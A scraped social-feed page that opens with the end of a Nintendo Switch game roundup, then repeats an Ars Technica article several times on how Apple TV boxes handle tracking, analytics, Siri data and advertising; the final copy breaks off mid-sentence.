FMV clips and a fake computer interface. Telling Lies is the Aliens to Her Story’s Alien. Instead of just investigating one woman’s interviews, you follow four different characters. Tracing a nonlinear mystery across so many different threads can get overwhelming. Fortunately, Hollywood actors Logan Marshall-Green, Alexandra Shipp, Kerry Bishé, and Angela Sarafyan make the clips compelling watches in their own right. Besides, we’re all pretty used at communicating through video chat these days.  Triangle Strategy Triangle Strategy (for Nintendo Switch) 4.0 Excellent A tactical follow-up to the gorgeous Octopath Traveler, Triangle Strategy is a luxurious strategy role-playing game that rewards your patience. Soak in the atmosphere on the land. Become invested in the characters and political intrigue. Methodically think through every option during turn-based battles and feel like an absolute strategic genius.  Trombone Champ Trombone Champ (for Nintendo Switch) Rhythm games usually make you feel like an ultra-cool rock god. Not Trombone Champ. This zany title embraces the goofy charm of its titular instrument, delivering an experience that is both awesome and awkward. The purposefully bumbling controls make each song sound like a confused elephant putting on a concert, an effect that's multiplied in local multiplayer. A light progression system unlocks famous trombone players like baseball cards while trying to solve a sinister riddle. The game is also available on PC, but the Switch version deserves props for its hilarious motion controls that take the trombone simulation to the next level. Tokyo Mirage Sessions #FE Encore Tokyo Mirage Sessions #FE Encore (for Nintendo Switch) 3.5 Good While you wait for Persona 5 to come to the Nintendo Switch, Tokyo Mirage Sessions #FE, a late Wii U port, is the next best thing. This bewildering crossover between Fire Emblem and Shin Megami Tensei has players entering the entertainment industry of Japan’s stylish Shibuya and Harajuku districts. Of course, you also do battle against demons by summoning Fire Emblem characters through the power of song. A streamlined battle system and pop music tone should delight players who don’t even care about anime RPGs.  Unicorn Overlord 4.5 Excellent As a Vanillaware game, we’re not surprised that Unicorn Overlord has an unbelievably beautiful illustrated aesthetic. However, the game backs up its looks with deeply strategic role-playing gameplay that requires tactical thinking. Ogre Battle fans, this one’s for you. Unicorn Overlord review Void Bastards Roguelikes can be a polarizing genre as their repetitive nature, random elements, and punishing difficulty threaten to make the entire experience a waste of time. Void Bastards avoids this trap with a core gameplay loop that’s a joy to repeat and an addictive sense of progression stringing you along the whole time.Each new spaceship you raid is basically a tiny comic book-styled System Shock level with spooky enemies to shoot, machinery to hack, character traits to manage, and equipment to salvage. Use that equipment to construct permanent new weapons and perks that make you eager to start another raid. Our journey across the galaxy stretched on for hours because it’s so easy to say “just one more piece of loot.”Note that Void Bastards is published by Humble Bundle, which is owned by PCMag’s parent company, Ziff Davis. WarioWare: Get It Together WarioWare: Get It Together (for Nintendo Switch) 4.0 Excellent WarioWare is one of Nintendo’s best and most shockingly self-aware franchises. It’s about Mario’s gross, evil doppelganger starting a shady game company to get rich. Fortunately for you, these “microgames” remain a pure blast of weird and wonderful bite-sized entertainment. The new gimmick here lets you and a friend tackle challenges with different characters whose unique move sets make you rethink your approach on the fly. Hurry up! Xenoblade Chronicles X: Definitive Edition 4.0 Excellent This late-period Wii U gem finally returns to close out the Nintendo Switch era. A standalone entry of the Xenoblade saga, Xenoblade Chronicles X: Definitive Edition takes place on a lush open-world planet teeming with friendly and hostile creatures. Explore on foot or, eventually, by flying a giant mech. The dynamic RPG combat rewards smart timing and synchronizing party members. Along with improved visuals, this definitive edition adds a new epilogue story. Xenoblade Chronicles X: Definitive Edition review
    Like
    Love
    Wow
    Sad
    Angry
    730
    4 Комментарии 0 Поделились 0 предпросмотр
  • Breaking down why Apple TVs are privacy advocates’ go-to streaming device

    Smart TVs, take note

    Breaking down why Apple TVs are privacy advocates’ go-to streaming device

    Using the Apple TV app or an Apple account means giving Apple more data, though.

    Scharon Harding



    Jun 1, 2025 7:35 am

    |

    22

    Credit:

    Aurich Lawson | Getty Images

    Credit:

    Aurich Lawson | Getty Images

    Story text

    Size

    Small
    Standard
    Large

    Width
    *

    Standard
    Wide

    Links

    Standard
    Orange

    * Subscribers only
      Learn more

    Every time I write an article about the escalating advertising and tracking on today's TVs, someone brings up Apple TV boxes. Among smart TVs, streaming sticks, and other streaming devices, Apple TVs are largely viewed as a safe haven.
    "Just disconnect your TV from the Internet and use an Apple TV box."
    That's the common guidance you'll hear from Ars readers for those seeking the joys of streaming without giving up too much privacy. Based on our research and the experts we've consulted, that advice is pretty solid, as Apple TVs offer significantly more privacy than other streaming hardware providers.
    But how private are Apple TV boxes, really? Apple TVs don't use automatic content recognition, but could that change? And what about the software that Apple TV users do use—could those apps provide information about you to advertisers or Apple?
    In this article, we'll delve into what makes the Apple TV's privacy stand out and examine whether users should expect the limited ads and enhanced privacy to last forever.
    Apple TV boxes limit tracking out of the box
    One of the simplest ways Apple TVs ensure better privacy is through their setup process, during which you can disable Siri, location tracking, and sending analytics data to Apple. During setup, users also receive several opportunities to review Apple's data and privacy policies. Also off by default is the boxes' ability to send voice input data to Apple.
    Most other streaming devices require users to navigate through pages of settings to disable similar tracking capabilities, which most people are unlikely to do. Apple’s approach creates a line of defense against snooping, even for those unaware of how invasive smart devices can be.

    Apple TVs running tvOS 14.5 and later also make third-party app tracking more difficult by requiring such apps to request permission before they can track users.
    "If you choose Ask App Not to Track, the app developer can’t access the system advertising identifier, which is often used to track," Apple says. "The app is also not permitted to track your activity using other information that identifies you or your device, like your email address."
    Users can access the Apple TV settings and disable the ability of third-party apps to ask permission for tracking. However, Apple could further enhance privacy by enabling this setting by default.
    The Apple TV also lets users control which apps can access the set-top box's Bluetooth functionality, photos, music, and HomeKit data, and the remote's microphone.
    "Apple’s primary business model isn’t dependent on selling targeted ads, so it has somewhat less incentive to harvest and monetize incredible amounts of your data," said RJ Cross, director of the consumer privacy program at the Public Interest Research Group. "I personally trust them more with my data than other tech companies."
    What if you share analytics data?
    If you allow your Apple TV to share analytics data with Apple or app developers, that data won't be personally identifiable, Apple says. Any collected personal data is "not logged at all, removed from reports before they’re sent to Apple, or protected by techniques, such as differential privacy," Apple says.
    Differential privacy, which injects noise into collected data, is one of the most common methods used for anonymizing data. In support documentation, Apple details its use of differential privacy:
    The first step we take is to privatize the information using local differential privacy on the user’s device. The purpose of privatization is to assure that Apple’s servers don't receive clear data. Device identifiers are removed from the data, and it is transmitted to Apple over an encrypted channel. The Apple analysis system ingests the differentially private contributions, dropping IP addresses and other metadata. The final stage is aggregation, where the privatized records are processed to compute the relevant statistics, and the aggregate statistics are then shared with relevant Apple teams. Both the ingestion and aggregation stages are performed in a restricted access environment so even the privatized data isn’t broadly accessible to Apple employees.
    What if you use an Apple account with your Apple TV?
    Another factor to consider is Apple's privacy policy regarding Apple accounts, formerly Apple IDs.

    Apple support documentation says you "need" an Apple account to use an Apple TV, but you can use the hardware without one. Still, it's common for people to log into Apple accounts on their Apple TV boxes because it makes it easier to link with other Apple products. Another reason someone might link an Apple TV box with an Apple account is to use the Apple TV app, a common way to stream on Apple TV boxes.

    So what type of data does Apple harvest from Apple accounts? According to its privacy policy, the company gathers usage data, such as "data about your activity on and use of" Apple offerings, including "app launches within our services...; browsing history; search history;product interaction."
    Other types of data Apple may collect from Apple accounts include transaction information, account information, device information, contact information, and payment information. None of that is surprising considering the type of data needed to make an Apple account work.
    Many Apple TV users can expect Apple to gather more data from their Apple account usage on other devices, such as iPhones or Macs. However, if you use the same Apple account across multiple devices, Apple recognizes that all the data it has collected from, for example, your iPhone activity, also applies to you as an Apple TV user.
    A potential workaround could be maintaining multiple Apple accounts. With an Apple account solely dedicated to your Apple TV box and Apple TV hardware and software tracking disabled as much as possible, Apple would have minimal data to ascribe to you as an Apple TV owner. You can also use your Apple TV box without an Apple account, but then you won't be able to use the Apple TV app, one of the device's key features.

    Data collection via the Apple TV app
    You can download third-party apps like Netflix and Hulu onto an Apple TV box, but most TV and movie watching on Apple TV boxes likely occurs via the Apple TV app. The app is necessary for watching content on the Apple TV+ streaming service, but it also drives usage by providing access to the libraries of manypopular streaming apps in one location. So understanding the Apple TV app’s privacy policy is critical to evaluating how private Apple TV activity truly is.
    As expected, some of the data the app gathers is necessary for the software to work. That includes, according to the app's privacy policy, "information about your purchases, downloads, activity in the Apple TV app, the content you watch, and where you watch it in the Apple TV app and in connected apps on any of your supported devices." That all makes sense for ensuring that the app remembers things like which episode of Severance you're on across devices.
    Apple collects other data, though, that isn't necessary for functionality. It says it gathers data on things like the "features you use," content pages you view, how you interact with notifications, and approximate location informationto help improve the app.
    Additionally, Apple tracks the terms you search for within the app, per its policy:
    We use Apple TV search data to improve models that power Apple TV. For example, aggregate Apple TV search queries are used to fine-tune the Apple TV search model.
    This data usage is less intrusive than that of other streaming devices, which might track your activity and then sell that data to third-party advertisers. But some people may be hesitant about having any of their activities tracked to benefit a multi-trillion-dollar conglomerate.

    Data collected from the Apple TV app used for ads
    By default, the Apple TV app also tracks "what you watch, your purchases, subscriptions, downloads, browsing, and other activities in the Apple TV app" to make personalized content recommendations. Content recommendations aren't ads in the traditional sense but instead provide a way for Apple to push you toward products by analyzing data it has on you.
    You can disable the Apple TV app's personalized recommendations, but it's a little harder than you might expect since you can't do it through the app. Instead, you need to go to the Apple TV settings and then select Apps > TV > Use Play History > Off.
    The most privacy-conscious users may wish that personalized recommendations were off by default. Darío Maestro, senior legal fellow at the nonprofit Surveillance Technology Oversight Project, noted to Ars that even though Apple TV users can opt out of personalized content recommendations, "many will not realize they can."

    Apple can also use data it gathers on you from the Apple TV app to serve traditional ads. If you allow your Apple TV box to track your location, the Apple TV app can also track your location. That data can "be used to serve geographically relevant ads," according to the Apple TV app privacy policy. Location tracking, however, is off by default on Apple TV boxes.
    Apple's tvOS doesn't have integrated ads. For comparison, some TV OSes, like Roku OS and LG's webOS, show ads on the OS's home screen and/or when showing screensavers.
    But data gathered from the Apple TV app can still help Apple's advertising efforts. This can happen if you allow personalized ads in other Apple apps serving targeted apps, such as Apple News, the App Store, or Stocks. In such cases, Apple may apply data gathered from the Apple TV app, "including information about the movies and TV shows you purchase from Apple, to serve ads in those apps that are more relevant to you," the Apple TV app privacy policy says.

    Apple also provides third-party advertisers and strategic partners with "non-personal data" gathered from the Apple TV app:
    We provide some non-personal data to our advertisers and strategic partners that work with Apple to provide our products and services, help Apple market to customers, and sell ads on Apple’s behalf to display on the App Store and Apple News and Stocks.
    Apple also shares non-personal data from the Apple TV with third parties, such as content owners, so they can pay royalties, gauge how much people are watching their shows or movies, "and improve their associated products and services," Apple says.
    Apple's policy notes:
    For example, we may share non-personal data about your transactions, viewing activity, and region, as well as aggregated user demographicssuch as age group and gender, to Apple TV strategic partners, such as content owners, so that they can measure the performance of their creative workmeet royalty and accounting requirements.
    When reached for comment, an Apple spokesperson told Ars that Apple TV users can clear their play history from the app.
    All that said, the Apple TV app still shares far less data with third parties than other streaming apps. Netflix, for example, says it discloses some personal information to advertising companies "in order to select Advertisements shown on Netflix, to facilitate interaction with Advertisements, and to measure and improve effectiveness of Advertisements."
    Warner Bros. Discovery says it discloses information about Max viewers "with advertisers, ad agencies, ad networks and platforms, and other companies to provide advertising to you based on your interests." And Disney+ users have Nielsen tracking on by default.
    What if you use Siri?
    You can easily deactivate Siri when setting up an Apple TV. But those who opt to keep the voice assistant and the ability to control Apple TV with their voice take somewhat of a privacy hit.

    According to the privacy policy accessible in Apple TV boxes' settings, Apple boxes automatically send all Siri requests to Apple's servers. If you opt into using Siri data to "Improve Siri and Dictation," Apple will store your audio data. If you opt out, audio data won't be stored, but per the policy:
    In all cases, transcripts of your interactions will be sent to Apple to process your requests and may be stored by Apple.
    Apple TV boxes also send audio and transcriptions of dictation input to Apple servers for processing. Apple says it doesn't store the audio but may store transcriptions of the audio.
    If you opt to "Improve Siri and Dictation," Apple says your history of voice requests isn't tied to your Apple account or email. But Apple is vague about how long it may store data related to voice input performed with the Apple TV if you choose this option.
    The policy states:
    Your request history, which includes transcripts and any related request data, is associated with a random identifier for up to six months and is not tied to your Apple Account or email address. After six months, you request history is disassociated from the random identifier and may be retained for up to two years. Apple may use this data to develop and improve Siri, Dictation, Search, and limited other language processing functionality in Apple products ...
    Apple may also review a subset of the transcripts of your interactions and this ... may be kept beyond two years for the ongoing improvements of products and services.
    Apple promises not to use Siri and voice data to build marketing profiles or sell them to third parties, but it hasn't always adhered to that commitment. In January, Apple agreed to pay million to settle a class-action lawsuit accusing Siri of recording private conversations and sharing them with third parties for targeted ads. In 2019, contractors reported hearing private conversations and recorded sex via Siri-gathered audio.

    Outside of Apple, we've seen voice request data used questionably, including in criminal trials and by corporate employees. Siri and dictation data also represent additional ways a person's Apple TV usage might be unexpectedly analyzed to fuel Apple's business.

    Automatic content recognition
    Apple TVs aren't preloaded with automatic content recognition, an Apple spokesperson confirmed to Ars, another plus for privacy advocates. But ACR is software, so Apple could technically add it to Apple TV boxes via a software update at some point.
    Sherman Li, the founder of Enswers, the company that first put ACR in Samsung TVs, confirmed to Ars that it's technically possible for Apple to add ACR to already-purchased Apple boxes. Years ago, Enswers retroactively added ACR to other types of streaming hardware, including Samsung and LG smart TVs.In general, though, there are challenges to adding ACR to hardware that people already own, Li explained:
    Everyone believes, in theory, you can add ACR anywhere you want at any time because it's software, but because of the wayarchitected... the interplay between the chipsets, like the SoCs, and the firmware is different in a lot of situations.
    Li pointed to numerous variables that could prevent ACR from being retroactively added to any type of streaming hardware, "including access to video frame buffers, audio streams, networking connectivity, security protocols, OSes, and app interface communication layers, especially at different levels of the stack in these devices, depending on the implementation."
    Due to the complexity of Apple TV boxes, Li suspects it would be difficult to add ACR to already-purchased Apple TVs. It would likely be simpler for Apple to release a new box with ACR if it ever decided to go down that route.

    If Apple were to add ACR to old or new Apple TV boxes, the devices would be far less private, and the move would be highly unpopular and eliminate one of the Apple TV's biggest draws.
    However, Apple reportedly has a growing interest in advertising to streaming subscribers. The Apple TV+ streaming service doesn't currently show commercials, but the company is rumored to be exploring a potential ad tier. The suspicions stem from a reported meeting between Apple and the United Kingdom's ratings body, Barb, to discuss how it might track ads on Apple TV+, according to a July report from The Telegraph.
    Since 2023, Apple has also hired several prominent names in advertising, including a former head of advertising at NBCUniversal and a new head of video ad sales. Further, Apple TV+ is one of the few streaming services to remain ad-free, and it's reported to be losing Apple billion per year since its launch.
    One day soon, Apple may have much more reason to care about advertising in streaming and being able to track the activities of people who use its streaming offerings. That has implications for Apple TV box users.
    "The more Apple creeps into the targeted ads space, the less I’ll trust them to uphold their privacy promises. You can imagine Apple TV being a natural progression for selling ads," PIRG's Cross said.
    Somewhat ironically, Apple has marketed its approach to privacy as a positive for advertisers.
    "Apple’s commitment to privacy and personal relevancy builds trust amongst readers, driving a willingness to engage with content and ads alike," Apple's advertising guide for buying ads on Apple News and Stocks reads.
    The most private streaming gadget
    It remains technologically possible for Apple to introduce intrusive tracking or ads to Apple TV boxes, but for now, the streaming devices are more private than the vast majority of alternatives, save for dumb TVs. And if Apple follows its own policies, much of the data it gathers should be kept in-house.

    However, those with strong privacy concerns should be aware that Apple does track certain tvOS activities, especially those that happen through Apple accounts, voice interaction, or the Apple TV app. And while most of Apple's streaming hardware and software settings prioritize privacy by default, some advocates believe there's room for improvement.
    For example, STOP's Maestro said:
    Unlike in the, where the upcoming Data Act will set clearer rules on transfers of data generated by smart devices, the US has no real legislation governing what happens with your data once it reaches Apple's servers. Users are left with little way to verify those privacy promises.
    Maestro suggested that Apple could address these concerns by making it easier for people to conduct security research on smart device software. "Allowing the development of alternative or modified software that can evaluate privacy settings could also increase user trust and better uphold Apple's public commitment to privacy," Maestro said.
    There are ways to limit the amount of data that advertisers can get from your Apple TV. But if you use the Apple TV app, Apple can use your activity to help make business decisions—and therefore money.
    As you might expect from a device that connects to the Internet and lets you stream shows and movies, Apple TV boxes aren't totally incapable of tracking you. But they're still the best recommendation for streaming users seeking hardware with more privacy and fewer ads.

    Scharon Harding
    Senior Technology Reporter

    Scharon Harding
    Senior Technology Reporter

    Scharon is a Senior Technology Reporter at Ars Technica writing news, reviews, and analysis on consumer gadgets and services. She's been reporting on technology for over 10 years, with bylines at Tom’s Hardware, Channelnomics, and CRN UK.

    22 Comments
    #breaking #down #why #apple #tvs
    Breaking down why Apple TVs are privacy advocates’ go-to streaming device
    Smart TVs, take note Breaking down why Apple TVs are privacy advocates’ go-to streaming device Using the Apple TV app or an Apple account means giving Apple more data, though. Scharon Harding – Jun 1, 2025 7:35 am | 22 Credit: Aurich Lawson | Getty Images Credit: Aurich Lawson | Getty Images Story text Size Small Standard Large Width * Standard Wide Links Standard Orange * Subscribers only   Learn more Every time I write an article about the escalating advertising and tracking on today's TVs, someone brings up Apple TV boxes. Among smart TVs, streaming sticks, and other streaming devices, Apple TVs are largely viewed as a safe haven. "Just disconnect your TV from the Internet and use an Apple TV box." That's the common guidance you'll hear from Ars readers for those seeking the joys of streaming without giving up too much privacy. Based on our research and the experts we've consulted, that advice is pretty solid, as Apple TVs offer significantly more privacy than other streaming hardware providers. But how private are Apple TV boxes, really? Apple TVs don't use automatic content recognition, but could that change? And what about the software that Apple TV users do use—could those apps provide information about you to advertisers or Apple? In this article, we'll delve into what makes the Apple TV's privacy stand out and examine whether users should expect the limited ads and enhanced privacy to last forever. Apple TV boxes limit tracking out of the box One of the simplest ways Apple TVs ensure better privacy is through their setup process, during which you can disable Siri, location tracking, and sending analytics data to Apple. During setup, users also receive several opportunities to review Apple's data and privacy policies. Also off by default is the boxes' ability to send voice input data to Apple. Most other streaming devices require users to navigate through pages of settings to disable similar tracking capabilities, which most people are unlikely to do. Apple’s approach creates a line of defense against snooping, even for those unaware of how invasive smart devices can be. Apple TVs running tvOS 14.5 and later also make third-party app tracking more difficult by requiring such apps to request permission before they can track users. "If you choose Ask App Not to Track, the app developer can’t access the system advertising identifier, which is often used to track," Apple says. "The app is also not permitted to track your activity using other information that identifies you or your device, like your email address." Users can access the Apple TV settings and disable the ability of third-party apps to ask permission for tracking. However, Apple could further enhance privacy by enabling this setting by default. The Apple TV also lets users control which apps can access the set-top box's Bluetooth functionality, photos, music, and HomeKit data, and the remote's microphone. "Apple’s primary business model isn’t dependent on selling targeted ads, so it has somewhat less incentive to harvest and monetize incredible amounts of your data," said RJ Cross, director of the consumer privacy program at the Public Interest Research Group. "I personally trust them more with my data than other tech companies." What if you share analytics data? If you allow your Apple TV to share analytics data with Apple or app developers, that data won't be personally identifiable, Apple says. Any collected personal data is "not logged at all, removed from reports before they’re sent to Apple, or protected by techniques, such as differential privacy," Apple says. Differential privacy, which injects noise into collected data, is one of the most common methods used for anonymizing data. In support documentation, Apple details its use of differential privacy: The first step we take is to privatize the information using local differential privacy on the user’s device. The purpose of privatization is to assure that Apple’s servers don't receive clear data. Device identifiers are removed from the data, and it is transmitted to Apple over an encrypted channel. The Apple analysis system ingests the differentially private contributions, dropping IP addresses and other metadata. The final stage is aggregation, where the privatized records are processed to compute the relevant statistics, and the aggregate statistics are then shared with relevant Apple teams. Both the ingestion and aggregation stages are performed in a restricted access environment so even the privatized data isn’t broadly accessible to Apple employees. What if you use an Apple account with your Apple TV? Another factor to consider is Apple's privacy policy regarding Apple accounts, formerly Apple IDs. Apple support documentation says you "need" an Apple account to use an Apple TV, but you can use the hardware without one. Still, it's common for people to log into Apple accounts on their Apple TV boxes because it makes it easier to link with other Apple products. Another reason someone might link an Apple TV box with an Apple account is to use the Apple TV app, a common way to stream on Apple TV boxes. So what type of data does Apple harvest from Apple accounts? According to its privacy policy, the company gathers usage data, such as "data about your activity on and use of" Apple offerings, including "app launches within our services...; browsing history; search history;product interaction." Other types of data Apple may collect from Apple accounts include transaction information, account information, device information, contact information, and payment information. None of that is surprising considering the type of data needed to make an Apple account work. Many Apple TV users can expect Apple to gather more data from their Apple account usage on other devices, such as iPhones or Macs. However, if you use the same Apple account across multiple devices, Apple recognizes that all the data it has collected from, for example, your iPhone activity, also applies to you as an Apple TV user. A potential workaround could be maintaining multiple Apple accounts. With an Apple account solely dedicated to your Apple TV box and Apple TV hardware and software tracking disabled as much as possible, Apple would have minimal data to ascribe to you as an Apple TV owner. You can also use your Apple TV box without an Apple account, but then you won't be able to use the Apple TV app, one of the device's key features. Data collection via the Apple TV app You can download third-party apps like Netflix and Hulu onto an Apple TV box, but most TV and movie watching on Apple TV boxes likely occurs via the Apple TV app. The app is necessary for watching content on the Apple TV+ streaming service, but it also drives usage by providing access to the libraries of manypopular streaming apps in one location. So understanding the Apple TV app’s privacy policy is critical to evaluating how private Apple TV activity truly is. As expected, some of the data the app gathers is necessary for the software to work. That includes, according to the app's privacy policy, "information about your purchases, downloads, activity in the Apple TV app, the content you watch, and where you watch it in the Apple TV app and in connected apps on any of your supported devices." That all makes sense for ensuring that the app remembers things like which episode of Severance you're on across devices. Apple collects other data, though, that isn't necessary for functionality. It says it gathers data on things like the "features you use," content pages you view, how you interact with notifications, and approximate location informationto help improve the app. Additionally, Apple tracks the terms you search for within the app, per its policy: We use Apple TV search data to improve models that power Apple TV. For example, aggregate Apple TV search queries are used to fine-tune the Apple TV search model. This data usage is less intrusive than that of other streaming devices, which might track your activity and then sell that data to third-party advertisers. But some people may be hesitant about having any of their activities tracked to benefit a multi-trillion-dollar conglomerate. Data collected from the Apple TV app used for ads By default, the Apple TV app also tracks "what you watch, your purchases, subscriptions, downloads, browsing, and other activities in the Apple TV app" to make personalized content recommendations. Content recommendations aren't ads in the traditional sense but instead provide a way for Apple to push you toward products by analyzing data it has on you. You can disable the Apple TV app's personalized recommendations, but it's a little harder than you might expect since you can't do it through the app. Instead, you need to go to the Apple TV settings and then select Apps > TV > Use Play History > Off. The most privacy-conscious users may wish that personalized recommendations were off by default. Darío Maestro, senior legal fellow at the nonprofit Surveillance Technology Oversight Project, noted to Ars that even though Apple TV users can opt out of personalized content recommendations, "many will not realize they can." Apple can also use data it gathers on you from the Apple TV app to serve traditional ads. If you allow your Apple TV box to track your location, the Apple TV app can also track your location. That data can "be used to serve geographically relevant ads," according to the Apple TV app privacy policy. Location tracking, however, is off by default on Apple TV boxes. Apple's tvOS doesn't have integrated ads. For comparison, some TV OSes, like Roku OS and LG's webOS, show ads on the OS's home screen and/or when showing screensavers. But data gathered from the Apple TV app can still help Apple's advertising efforts. This can happen if you allow personalized ads in other Apple apps serving targeted apps, such as Apple News, the App Store, or Stocks. In such cases, Apple may apply data gathered from the Apple TV app, "including information about the movies and TV shows you purchase from Apple, to serve ads in those apps that are more relevant to you," the Apple TV app privacy policy says. Apple also provides third-party advertisers and strategic partners with "non-personal data" gathered from the Apple TV app: We provide some non-personal data to our advertisers and strategic partners that work with Apple to provide our products and services, help Apple market to customers, and sell ads on Apple’s behalf to display on the App Store and Apple News and Stocks. Apple also shares non-personal data from the Apple TV with third parties, such as content owners, so they can pay royalties, gauge how much people are watching their shows or movies, "and improve their associated products and services," Apple says. Apple's policy notes: For example, we may share non-personal data about your transactions, viewing activity, and region, as well as aggregated user demographicssuch as age group and gender, to Apple TV strategic partners, such as content owners, so that they can measure the performance of their creative workmeet royalty and accounting requirements. When reached for comment, an Apple spokesperson told Ars that Apple TV users can clear their play history from the app. All that said, the Apple TV app still shares far less data with third parties than other streaming apps. Netflix, for example, says it discloses some personal information to advertising companies "in order to select Advertisements shown on Netflix, to facilitate interaction with Advertisements, and to measure and improve effectiveness of Advertisements." Warner Bros. Discovery says it discloses information about Max viewers "with advertisers, ad agencies, ad networks and platforms, and other companies to provide advertising to you based on your interests." And Disney+ users have Nielsen tracking on by default. What if you use Siri? You can easily deactivate Siri when setting up an Apple TV. But those who opt to keep the voice assistant and the ability to control Apple TV with their voice take somewhat of a privacy hit. According to the privacy policy accessible in Apple TV boxes' settings, Apple boxes automatically send all Siri requests to Apple's servers. If you opt into using Siri data to "Improve Siri and Dictation," Apple will store your audio data. If you opt out, audio data won't be stored, but per the policy: In all cases, transcripts of your interactions will be sent to Apple to process your requests and may be stored by Apple. Apple TV boxes also send audio and transcriptions of dictation input to Apple servers for processing. Apple says it doesn't store the audio but may store transcriptions of the audio. If you opt to "Improve Siri and Dictation," Apple says your history of voice requests isn't tied to your Apple account or email. But Apple is vague about how long it may store data related to voice input performed with the Apple TV if you choose this option. The policy states: Your request history, which includes transcripts and any related request data, is associated with a random identifier for up to six months and is not tied to your Apple Account or email address. After six months, you request history is disassociated from the random identifier and may be retained for up to two years. Apple may use this data to develop and improve Siri, Dictation, Search, and limited other language processing functionality in Apple products ... Apple may also review a subset of the transcripts of your interactions and this ... may be kept beyond two years for the ongoing improvements of products and services. Apple promises not to use Siri and voice data to build marketing profiles or sell them to third parties, but it hasn't always adhered to that commitment. In January, Apple agreed to pay million to settle a class-action lawsuit accusing Siri of recording private conversations and sharing them with third parties for targeted ads. In 2019, contractors reported hearing private conversations and recorded sex via Siri-gathered audio. Outside of Apple, we've seen voice request data used questionably, including in criminal trials and by corporate employees. Siri and dictation data also represent additional ways a person's Apple TV usage might be unexpectedly analyzed to fuel Apple's business. Automatic content recognition Apple TVs aren't preloaded with automatic content recognition, an Apple spokesperson confirmed to Ars, another plus for privacy advocates. But ACR is software, so Apple could technically add it to Apple TV boxes via a software update at some point. Sherman Li, the founder of Enswers, the company that first put ACR in Samsung TVs, confirmed to Ars that it's technically possible for Apple to add ACR to already-purchased Apple boxes. Years ago, Enswers retroactively added ACR to other types of streaming hardware, including Samsung and LG smart TVs.In general, though, there are challenges to adding ACR to hardware that people already own, Li explained: Everyone believes, in theory, you can add ACR anywhere you want at any time because it's software, but because of the wayarchitected... the interplay between the chipsets, like the SoCs, and the firmware is different in a lot of situations. Li pointed to numerous variables that could prevent ACR from being retroactively added to any type of streaming hardware, "including access to video frame buffers, audio streams, networking connectivity, security protocols, OSes, and app interface communication layers, especially at different levels of the stack in these devices, depending on the implementation." Due to the complexity of Apple TV boxes, Li suspects it would be difficult to add ACR to already-purchased Apple TVs. It would likely be simpler for Apple to release a new box with ACR if it ever decided to go down that route. If Apple were to add ACR to old or new Apple TV boxes, the devices would be far less private, and the move would be highly unpopular and eliminate one of the Apple TV's biggest draws. However, Apple reportedly has a growing interest in advertising to streaming subscribers. The Apple TV+ streaming service doesn't currently show commercials, but the company is rumored to be exploring a potential ad tier. The suspicions stem from a reported meeting between Apple and the United Kingdom's ratings body, Barb, to discuss how it might track ads on Apple TV+, according to a July report from The Telegraph. Since 2023, Apple has also hired several prominent names in advertising, including a former head of advertising at NBCUniversal and a new head of video ad sales. Further, Apple TV+ is one of the few streaming services to remain ad-free, and it's reported to be losing Apple billion per year since its launch. One day soon, Apple may have much more reason to care about advertising in streaming and being able to track the activities of people who use its streaming offerings. That has implications for Apple TV box users. "The more Apple creeps into the targeted ads space, the less I’ll trust them to uphold their privacy promises. You can imagine Apple TV being a natural progression for selling ads," PIRG's Cross said. Somewhat ironically, Apple has marketed its approach to privacy as a positive for advertisers. "Apple’s commitment to privacy and personal relevancy builds trust amongst readers, driving a willingness to engage with content and ads alike," Apple's advertising guide for buying ads on Apple News and Stocks reads. The most private streaming gadget It remains technologically possible for Apple to introduce intrusive tracking or ads to Apple TV boxes, but for now, the streaming devices are more private than the vast majority of alternatives, save for dumb TVs. And if Apple follows its own policies, much of the data it gathers should be kept in-house. However, those with strong privacy concerns should be aware that Apple does track certain tvOS activities, especially those that happen through Apple accounts, voice interaction, or the Apple TV app. And while most of Apple's streaming hardware and software settings prioritize privacy by default, some advocates believe there's room for improvement. For example, STOP's Maestro said: Unlike in the, where the upcoming Data Act will set clearer rules on transfers of data generated by smart devices, the US has no real legislation governing what happens with your data once it reaches Apple's servers. Users are left with little way to verify those privacy promises. Maestro suggested that Apple could address these concerns by making it easier for people to conduct security research on smart device software. "Allowing the development of alternative or modified software that can evaluate privacy settings could also increase user trust and better uphold Apple's public commitment to privacy," Maestro said. There are ways to limit the amount of data that advertisers can get from your Apple TV. But if you use the Apple TV app, Apple can use your activity to help make business decisions—and therefore money. As you might expect from a device that connects to the Internet and lets you stream shows and movies, Apple TV boxes aren't totally incapable of tracking you. But they're still the best recommendation for streaming users seeking hardware with more privacy and fewer ads. Scharon Harding Senior Technology Reporter Scharon Harding Senior Technology Reporter Scharon is a Senior Technology Reporter at Ars Technica writing news, reviews, and analysis on consumer gadgets and services. She's been reporting on technology for over 10 years, with bylines at Tom’s Hardware, Channelnomics, and CRN UK. 22 Comments #breaking #down #why #apple #tvs
    ARSTECHNICA.COM
    Breaking down why Apple TVs are privacy advocates’ go-to streaming device
    Smart TVs, take note Breaking down why Apple TVs are privacy advocates’ go-to streaming device Using the Apple TV app or an Apple account means giving Apple more data, though. Scharon Harding – Jun 1, 2025 7:35 am | 22 Credit: Aurich Lawson | Getty Images Credit: Aurich Lawson | Getty Images Story text Size Small Standard Large Width * Standard Wide Links Standard Orange * Subscribers only   Learn more Every time I write an article about the escalating advertising and tracking on today's TVs, someone brings up Apple TV boxes. Among smart TVs, streaming sticks, and other streaming devices, Apple TVs are largely viewed as a safe haven. "Just disconnect your TV from the Internet and use an Apple TV box." That's the common guidance you'll hear from Ars readers for those seeking the joys of streaming without giving up too much privacy. Based on our research and the experts we've consulted, that advice is pretty solid, as Apple TVs offer significantly more privacy than other streaming hardware providers. But how private are Apple TV boxes, really? Apple TVs don't use automatic content recognition (ACR, a user-tracking technology leveraged by nearly all smart TVs and streaming devices), but could that change? And what about the software that Apple TV users do use—could those apps provide information about you to advertisers or Apple? In this article, we'll delve into what makes the Apple TV's privacy stand out and examine whether users should expect the limited ads and enhanced privacy to last forever. Apple TV boxes limit tracking out of the box One of the simplest ways Apple TVs ensure better privacy is through their setup process, during which you can disable Siri, location tracking, and sending analytics data to Apple. During setup, users also receive several opportunities to review Apple's data and privacy policies. Also off by default is the boxes' ability to send voice input data to Apple. Most other streaming devices require users to navigate through pages of settings to disable similar tracking capabilities, which most people are unlikely to do. Apple’s approach creates a line of defense against snooping, even for those unaware of how invasive smart devices can be. Apple TVs running tvOS 14.5 and later also make third-party app tracking more difficult by requiring such apps to request permission before they can track users. "If you choose Ask App Not to Track, the app developer can’t access the system advertising identifier (IDFA), which is often used to track," Apple says. "The app is also not permitted to track your activity using other 